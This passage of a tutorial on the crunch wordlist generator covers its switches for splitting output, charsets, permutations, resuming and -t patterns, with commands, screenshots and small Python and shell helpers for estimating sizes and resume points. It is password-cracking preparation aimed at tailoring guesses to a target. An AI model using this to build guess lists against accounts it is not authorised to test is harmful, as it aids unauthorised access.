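estimate_files() {        # $1 = min, $2 = max, $3 = charset size, $4 = -b size
    bytes=$(estimate_bytes "$1" "$2" "$3")
    chunk=$(size_to_bytes "$4") || return 1
    echo $(( (bytes + chunk - 1) / chunk ))
}

# One-line summary for a run, e.g. "report 6 6 10 1mb" for ./crunch 6 6 0123456789 -b 1mb.
report() {                # $1 = min, $2 = max, $3 = charset size, $4 = -b size
    echo "lengths $1..$2, charset of $3: $(estimate_lines "$1" "$2" "$3") lines," \
         "$(estimate_bytes "$1" "$2" "$3") bytes, ~$(estimate_files "$1" "$2" "$3" "$4") files of $4"
}

# Run the summaries only when invoked as "sh crunch_size.sh demo".
if [ "${1:-}" = demo ]; then
    report 6 6 10 1mb      # ./crunch 6 6 0123456789 -b 1mb -o START
    report 4 4 10 10kb     # ./crunch 4 4 0123456789 -b 10kb -o START
    report 8 8 16 2gb      # ./crunch 8 8 0123456789ABCDEF -b 2gb -o START
fi
```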
<br />
<br />
<div style="color: yellow;">
<u><b>CREATING WORDLISTS IN BLOCKS OF A CERTAIN LINECOUNT</b></u></div>
(ie. number of passphrases per file)<br />
<br />
Using the <b style="color: red;">-c</b> switch you can have crunch create wordlists which do not contain more than the<br />
specified number of lines.<br />
This must be used in conjunction with -o START.<br />
<br />
To create files containing no more than 200000 (200 thousand) lines (passphrases);<br />
<span style="color: lime;">./crunch 6 6 0123456789 -c 200000 -o START</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_c_200k.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_c_200k.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create files containing no more than 150000 (150 thousand) lines (passphrases);<br />
<div style="color: lime;">
./crunch 6 6 abcDEF123 -c 150000 -o START</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_c_150k.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_c_150k.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The output files will be named after the first and last entry in the wordlists.<br />
<br />
<br />
<b><span class="Apple-style-span" style="color: yellow;"><u>STOPPING CRUNCH WORDLIST GENERATION AT A PRE-DETERMINED TIME</u></span></b><br />
<br />
Crunch v3.1 is now also released (20-07-2011) and with it comes the new <b><span class="Apple-style-span" style="color: red;">-e</span></b> switch.<br />
<br />
This option allows you to specify when you want the wordlist generation to stop.<br />
<br />
So the below example will start creating the 6 character numeric wordlist, but will stop at 333333 ;<br />
<span class="Apple-style-span" style="color: lime;">./crunch 6 6 -t %%%%%% -e 333333</span><br />
<br />
<br />
<div style="color: yellow;">
<u><b>USING FIXED CHARACTER SETS</b></u></div>
<br />
Crunch also comes with fixed character sets in <i><b>charset.lst</b></i> which is included in the installation.<br />
(also found in directory /pentest/passwords/crunch/ )<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="499" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset-1.jpg" width="640" /></a></div>
<br />
<br />
<br />
This saves on the typing (and typos) when dealing with standard character sets.<br />
<br />
To use the fixed character sets instead of typing a character set manually on the command line,<br />
use the <b style="color: red;">-f</b> switch to specify which character set you want ;<br />
<br />
To use only upper case alpha characters; <br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst ualpha</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_UP.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_UP.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To use only numeric characters ; <br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst numeric</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_num.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="357" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_num.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To use hexadecimal characters (with uppercase alpha values) ;<br />
<div style="color: lime;">
./crunch 8 8 -f charset.lst hex-upper</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_HU.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_HU.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To use lower case, uppercase, numeric & special characters (beware of the size ! Don't try to save..lol..) ;<br />
<div style="color: lime;">
./crunch 8 8 -f charset.lst mixalpha-numeric-all-space</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_all.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_all.jpg" width="640" /></a></div>
<br />
<br />
<br />
etc.<br />
etc.<br />
<br />
Since v2.7 additional Swedish character support has also been added for our Swedish brethren, nicely contributed by Niclas Kroon.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset_swedish.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="512" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset_swedish.jpg" width="640" /></a></div>
<br />
It should be noted that you can easily create your own custom charset by simply including a line in the same format.<br />
If you for instance know that your target has a certain medical condition known as 133tsp34k, and you have an idea of which letters/numbers are usually used (forum posts etc. etc.), you could simply include an extra line such as ;<br />
<span style="color: lime;"><span style="color: yellow;">1337 = [4bcd3f9hijk1mn0pqr$7uvwxyz]</span> </span><br />
<i>Doubt the above is authentic enough, but I'm sure you get the idea. </i><br />
Then just run in crunch as you would any other charset;<br />
<span style="color: lime;">./crunch 4 4 -f charset.lst 1337</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_1337.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_1337.jpg" width="640" /></a></div>
<br />
See <span style="color: lime;">/pentest/passwords/crunch/charset.lst</span> for all possibilities / charsets currently included.<br />
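As an added example of the charset.lst format described above (my own Python, not crunch's code), the script below parses 'name = [chars]' lines, including a set that ends in a space and the custom 1337 line, and then works out how many lines and bytes a fixed-length run over that set would produce, which is the figure you want before deciding whether a list is worth writing to disk at all. The sample file contents are constructed to mirror the real file's layout; the byte count assumes one newline per line, which is how I understand crunch's own size estimate.<br />

```python
import re
from typing import Dict, Tuple

# Constructed sample in the same "name = [chars]" layout as crunch's charset.lst.
# The real file ships with crunch; these lines are only a stand-in for it.
SAMPLE_CHARSET_LST = """\
# charset.lst (constructed excerpt, same layout as crunch's own file)
ualpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
numeric = [0123456789]
numeric-space = [0123456789 ]
hex-upper = [0123456789ABCDEF]
symbols14 = [!@#$%^&*()-_+=]
1337 = [4bcd3f9hijk1mn0pqr$7uvwxyz]
"""

# name, '=', then everything between the first '[' and the LAST ']' on the line
_LINE = re.compile(r"^\s*([^\s=]+)\s*=\s*\[(.*)\]\s*$")


def parse_charset_lst(text: str) -> Dict[str, str]:
    """Return {name: characters} for every 'name = [chars]' line.

    The bracket contents are kept verbatim, so a trailing space (numeric-space)
    or a ']' inside the set survives. Blank lines and '#' comments are skipped;
    a malformed line or a set that repeats a character raises, because a
    duplicate would silently inflate the size estimate below.
    """
    sets: Dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        m = _LINE.match(raw)
        if not m:
            raise ValueError(f"charset.lst line {lineno}: cannot parse {raw!r}")
        name, chars = m.group(1), m.group(2)
        if len(set(chars)) != len(chars):
            raise ValueError(f"charset {name!r} repeats a character")
        sets[name] = chars
    return sets


def keyspace(charset_len: int, min_len: int, max_len: int) -> Tuple[int, int]:
    """(lines, bytes) for 'crunch MIN MAX <charset>' with no pattern.

    lines = sum of |C|^n for n in [MIN, MAX]; bytes add one '\\n' per line
    (my assumption about crunch's own estimate).
    """
    if not 1 <= min_len <= max_len:
        raise ValueError("need 1 <= MIN <= MAX")
    lines = total_bytes = 0
    for n in range(min_len, max_len + 1):
        words = charset_len ** n
        lines += words
        total_bytes += words * (n + 1)
    return lines, total_bytes


def estimate(text: str, name: str, min_len: int, max_len: int) -> Tuple[int, int]:
    """Size of 'crunch MIN MAX -f charset.lst NAME' for the given file contents."""
    sets = parse_charset_lst(text)
    if name not in sets:
        raise KeyError(f"no charset named {name!r} in charset.lst")
    return keyspace(len(sets[name]), min_len, max_len)


if __name__ == "__main__":
    for name, lo, hi in (("ualpha", 6, 6), ("hex-upper", 8, 8), ("1337", 4, 4)):
        lines, size = estimate(SAMPLE_CHARSET_LST, name, lo, hi)
        print(f"{name:>10} {lo}-{hi}: {lines:>14,} lines, {size / 2**30:8.2f} GiB")
```

Run it against the real file by reading /pentest/passwords/crunch/charset.lst into `text` instead of the constructed sample; the parser makes no other assumption about the file.<br />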
<br />
<br />
<div style="color: yellow;">
<u><b>INVERTING THE OUTPUT DIRECTION</b></u></div>
Using the <b style="color: red;">-i</b> option will invert the direction in which the wordlist is created, from <i><b>left-to-right</b></i> to <i><b>right-to-left</b></i>.<br />
Note that this does not change the content of the created wordlist, it only changes the initial direction in which it is created.<br />
<br />
<div style="color: lime;">
./crunch 4 4 -i</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_l.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_l.jpg" width="640" /></a></div>
<br />
The -i option can also be used when character sets have been specified, either manually or using the pre-defined charsets.<br />
<span style="color: lime;">./crunch 4 4 -f charset.lst ualpha -i</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_up.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_up.jpg" width="640" /></a></div>
<br />
or for instance for creating numeric wordlists in an alternative direction ;<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -i</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_num.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_num.jpg" width="640" /></a></div>
<br />
If you actually want the wordlist creation to start from the last letter in the alphabet and work backwards, or<br />
work backwards from the last digit in a 10 digit numeric sequence, then you would have to enter the charset manually ; <br />
<div style="color: lime;">
./crunch 4 4 zyxwvutsrqponmlkjihgfedcba</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_alpha.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_alpha.jpg" width="640" /></a></div>
<br />
<div style="color: lime;">
./crunch 4 4 ZYXWVUTSRQPONMLKJIHGFEDCBA</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_alpha_Up.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_alpha_Up.jpg" width="640" /></a></div>
<br />
<div style="color: lime;">
./crunch 8 8 9876543210</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_num.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_num.jpg" width="640" /></a></div>
<br />
<div style="color: yellow;">
<u><b>CREATING PERMUTATIONS</b></u></div>
<br />
Crunch can also be used to create permutations for either ; <br />
> characters / words entered in the command line with the <b style="color: red;">-p</b> switch.<br />
> lines in a wordlist with the <b style="color: red;">-q</b> switch<br />
<br />
Although the min/max character setting is not used for permutations, it still needs to be entered for both<br />
the -p and -q switches.<br />
<br />
Using the <b><span style="color: red;">-p</span></b> switch you can create permutations of characters or of all words entered in the command line.<br />
Creating permutations of letters (fun for anagrams) ;<br />
<div style="color: lime;">
./crunch 1 1 -p abcd</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_abcd.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_abcd.jpg" width="640" /></a></div>
<br />
Creating permutations of lists of words;<br />
<span style="color: lime;">./crunch 1 1 -p bird cat dog</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_wrd.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_wrd.jpg" width="640" /></a></div>
<br />
As the -p switch reads everything after it on the command line as letters or words, it MUST be the last option used;<br />
If for instance you try to suppress the size output message using the -u switch and place the -u switch last, <br />
crunch will see 2 words (<b><i style="color: yellow;">abcd</i> </b>+ <i style="color: yellow;"><b>-u</b></i>) and so will only print out the 2 permutation possibilities, without actually recognizing the -u switch ; <br />
<span style="color: lime;">./crunch 1 1 -p abcd -u</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_u1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="163" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_u1.jpg" width="640" /></a></div>
<br />
So to ensure the output is as expected, the -p switch <u>MUST</u> always be the last option, and the correct syntax<br />
with the above example would be ;<br />
<div style="color: lime;">
./crunch 1 1 -u -p abcd</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_u2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_u2.jpg" width="640" /></a></div>
<br />
Using the <b style="color: red;">-q</b> switch, you can create all possible permutations of the words in a text file ;<br />
(as always, beware of the possible size ! This is best done on a 'focused' wordlist)<br />
<br />
As an example, create a small text file with 3 lines and then run crunch over it with the -q option;<br />
<div style="color: lime;">
echo "bird" > test.txt && echo "cat" >> test.txt && echo "dog" >> test.txt</div>
<div style="color: lime;">
./crunch 1 1 -q test.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_q.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_q.jpg" width="640" /></a></div>
<br />
<u style="color: yellow;"><b>RESUMING WORDLIST CREATION AFTER CANCELLATION</b></u><br />
<br />
crunch allows wordlist creation to be stopped and restarted; to do this we use the <b style="color: red;">-r</b> (resume) switch.<br />
For this to work we must type the exact same command line followed by the -r switch ;<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -o test.txt</div>
Stop the creation with a Ctrl C, then restart with ;<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -o test.txt -r</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_r.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_r.jpg" width="640" /></a></div>
<br />
If the wordlist was started from a specific position (see the chapter below), then<br />
the -s switch and its startblock value must be removed when resuming ;<br />
<br />
When using this method, the notification on % complete will not be accurate. <br />
Also, when resuming, crunch will advise that it is generating xx amount of data and xx number of lines.<br />
This information will not be correct, as the calculation process thinks it is resuming a run over the entire wordlist, whereas it is of course resuming a run that began at a certain startblock. <br />
The picture below probably explains it better.. <br />
<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -s 59999999 -o test.txt</div>
After cancelling with a Ctrl C, resume would then be done with ;<br />
<span style="color: lime;">./crunch 8 8 0123456789 -o test.txt -r</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_r_s.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_r_s.jpg" width="640" /></a></div>
<br />
<div style="color: yellow;">
<b><u>STARTING FROM A SPECIFIC POSITION</u></b></div>
<br />
If we want to start crunch from a specific position in the wordlist we want to create, we can use the <b><span style="color: red;">-s</span></b><br />
switch to use a specific startblock as starting position for the wordlist.<br />
<br />
For instance, if you started creating a wordlist but had to cancel and resume on a different disk because the HDD space ran out.<br />
The temporary file that crunch uses for the wordlist creation is "<span style="color: yellow;">START</span>" located in the crunch directory<br />
<div style="color: yellow;">
/pentest/passwords/crunch/</div>
<br />
You can check this temporary file for the last couple of entries to allow you to move/rename the temp file START<br />
and restart the wordlist creation without losing the work already done. <br />
<br />
<u><i>example ;</i></u><br />
<div style="color: lime;">
./crunch 7 7 0123456789 -o test.txt</div>
> Ctrl + C stopping the wordlist creation,<br />
> check the last couple of entries in the START temporary file ;<br />
<div style="color: lime;">
tail -n 2 START</div>
> copy or rename the temporary file to a name of your liking; <br />
<div style="color: lime;">
cp START file1.txt</div>
> restart the wordlist creation from the last noted entry in the temporary file;<br />
<div style="color: lime;">
./crunch 7 7 0123456789 -s 9670549 -o test.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_s_cancel.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_s_cancel.jpg" width="640" /></a></div>
<br />
<b><span style="color: red;">NOTE!</span></b> crunch will overwrite START when it starts a new wordlist creation process, so be sure to rename START into whatever you want to ensure you don't lose the work already done !<br />
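To put numbers on the START / -s procedure above, here is an added Python helper (mine, not part of crunch) that treats a crunch word as a number in base |charset|: word_index gives the position of the last entry found in START, word_at inverts it, and resume_plan returns the -s startblock together with how many lines are already done and how many remain. That remaining count is exactly the figure crunch misreports when you -r a run that was started with -s, as noted in the previous chapter. The charsets used are the page's own digit and alphabet sets.<br />

```python
from typing import Tuple

# The charsets used on this page (constructed here for the demo)
DIGITS = "0123456789"
LOWER = "abcdefghijklmnopqrstuvwxyz"
REV_LOWER = "zyxwvutsrqponmlkjihgfedcba"   # the manual "backwards" charset


def word_index(word: str, charset: str) -> int:
    """Zero-based position of `word` in crunch's normal (left-to-right) order.

    crunch advances the rightmost position fastest, so a word is a number in
    base len(charset) whose first character is the most significant digit.
    """
    if not word:
        raise ValueError("empty word")
    base = len(charset)
    index = 0
    for ch in word:
        digit = charset.find(ch)
        if digit < 0:
            raise ValueError(f"{ch!r} is not in charset {charset!r}")
        index = index * base + digit
    return index


def word_at(index: int, length: int, charset: str) -> str:
    """Inverse of word_index: the word of the given length at zero-based index."""
    base = len(charset)
    if not 0 <= index < base ** length:
        raise ValueError("index lies outside the keyspace for this length")
    chars = []
    for _ in range(length):
        index, digit = divmod(index, base)
        chars.append(charset[digit])
    return "".join(reversed(chars))


def resume_plan(last_written: str, charset: str) -> Tuple[str, int, int]:
    """Turn the last line of START into (-s startblock, lines done, lines left).

    The last entry is used as the startblock rather than skipped, so that a
    line that was cut short by the Ctrl+C is regenerated in full.
    """
    length = len(last_written)
    done = word_index(last_written, charset)
    total = len(charset) ** length
    return last_written, done, total - done


if __name__ == "__main__":
    # the page's example: START ended at 9670549 in a 7-digit numeric run
    block, done, left = resume_plan("9670549", DIGITS)
    print(f"./crunch 7 7 {DIGITS} -s {block} -o test.txt  # {done:,} done, {left:,} to go")
    # and the -s 59999999 run: how many lines does it really produce?
    print(resume_plan("59999999", DIGITS)[2], "lines from 59999999 to 99999999")
```

For a plain digit charset the index is just the number itself, which is why the digit examples on this page look trivial; the same arithmetic applies unchanged to alphabetic or custom charsets, where reading the position off the word by eye is not possible.<br />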
<br />
Of course the starting block can be used for whatever reason, for instance if you are sure that you don't need any numbers starting before 59999999 ;<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -s 59999999 -o test.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_s_norm.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_s_norm.jpg" width="640" /></a></div>
<br />
<div style="color: yellow;">
<b><u>CREATING CUSTOM PATTERNS</u></b></div>
<br />
This is where crunch really shines, and in my humble opinion, the most powerful capability that crunch has to offer.<br />
<br />
With a minimum amount of information on known or expected patterns and/or possible characters in the passphrase, custom patterns can be created, allowing you to specify what to place where in the generated passphrases.<br />
In doing so the size of the wordlist can be reduced significantly and the wordlist can be tailored to the target in a much more efficient way, which is always to be endeavoured !<br />
<br />
To fix a pattern, we use the <b style="color: red;">-t</b> switch in crunch.<br />
<br />
There are fixed symbols used for certain character sets ; <br />
<span style="color: yellow;">@</span> --> Lower case alpha values (or @ will read and print from a specified character set, see further down in post)<br />
<span style="color: yellow;">,</span> --> Upper case alpha values <br />
<span style="color: yellow;">%</span> --> Numeric values<br />
<span style="color: yellow;">^</span> --> Special characters including 'space'<br />
<br />
So if we want to create a 6 character, lower alpha wordlist with a prefix of 'dog';<br />
<div style="color: lime;">
./crunch 6 6 -t dog@@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_01.jpg" width="640" /></a></div>
<br />
or if we want 'dog' to be appended ;<br />
<div style="color: lime;">
./crunch 6 6 -t @@@dog</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_02.jpg" width="640" /></a></div>
<br />
or have 'dog' bang in the middle ;<br />
<div style="color: lime;">
./crunch 7 7 -t @@dog@@</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_03.jpg" width="640" /></a></div>
<br />
Or 'dog' followed by an upper case alpha, number and symbol;<br />
<div style="color: lime;">
./crunch 6 6 -t dog,%^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_04.jpg" width="640" /></a></div>
<br />
<b><u>Miscellaneous patterns</u></b><br />
We can also combine the various fixed character sets, for instance, if we want to create an 8 character<br />
wordlist with alpha, numeric and special characters in fixed positions;<br />
<div style="color: lime;">
./crunch 8 8 -t ,,^^@@%%</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_05.jpg" width="640" /></a></div>
<br />
Using the fixed character sets you can quickly and easily make 'quick' wordlists for a single character set..<br />
<br />
Creating a wordlist with only lower case;<br />
<span style="color: lime;">./crunch 4 4 -t @@@@</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_06.jpg" width="640" /></a></div>
<br />
only numeric;<br />
<span style="color: lime;">./crunch 4 4 -t %%%%</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_07.jpg" width="640" /></a></div>
<br />
or only uppercase;<br />
<span style="color: lime;">./crunch 4 4 -t ,,,,</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_08.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_08.jpg" width="640" /></a></div>
<br />
only special characters;<br />
<div style="color: lime;">
./crunch 4 4 -t ^^^^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_09.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_09.jpg" width="640" /></a></div>
<br />
And of course if certain positions and characters are known, it can all be mixed up ;<br />
<span style="color: lime;">./crunch 9 9 -t %%DOG^^@@</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_10.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_10.jpg" width="640" /></a></div>
<br />
We can also go a step further and specify which range of characters should be used for each character type.<br />
<u>In the below example ;</u><br />
lower alpha values to only be ; <b style="color: yellow;">abcdef</b><br />
upper alpha values to only be ; <b style="color: yellow;">ABCDEF</b><br />
numeric values to only be ; <b style="color: yellow;">12345</b><br />
special characters to only be ; <b style="color: yellow;">@#$%</b><br />
<br />
We can then specify same by entering these values manually in the command line ;<br />
<div style="color: red;">
<i>Note that it is required to enter the custom values in the order ;</i></div>
lower alpha -- upper alpha -- numeric -- special characters<br />
<br />
<div style="color: lime;">
./crunch 8 8 abcdef ABCDEF 12345 @#$%- -t @@,,%%^^</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_t_ms1.jpg" width="640" /></a></div>
<br />
If there is no specific character range to be used for a character set, then that position should be<br />
filled with a '+' placeholder sign, which signifies the usage of the complete standard character set for that set position (lower alpha -- upper alpha -- numeric -- special characters).<br />
<br />
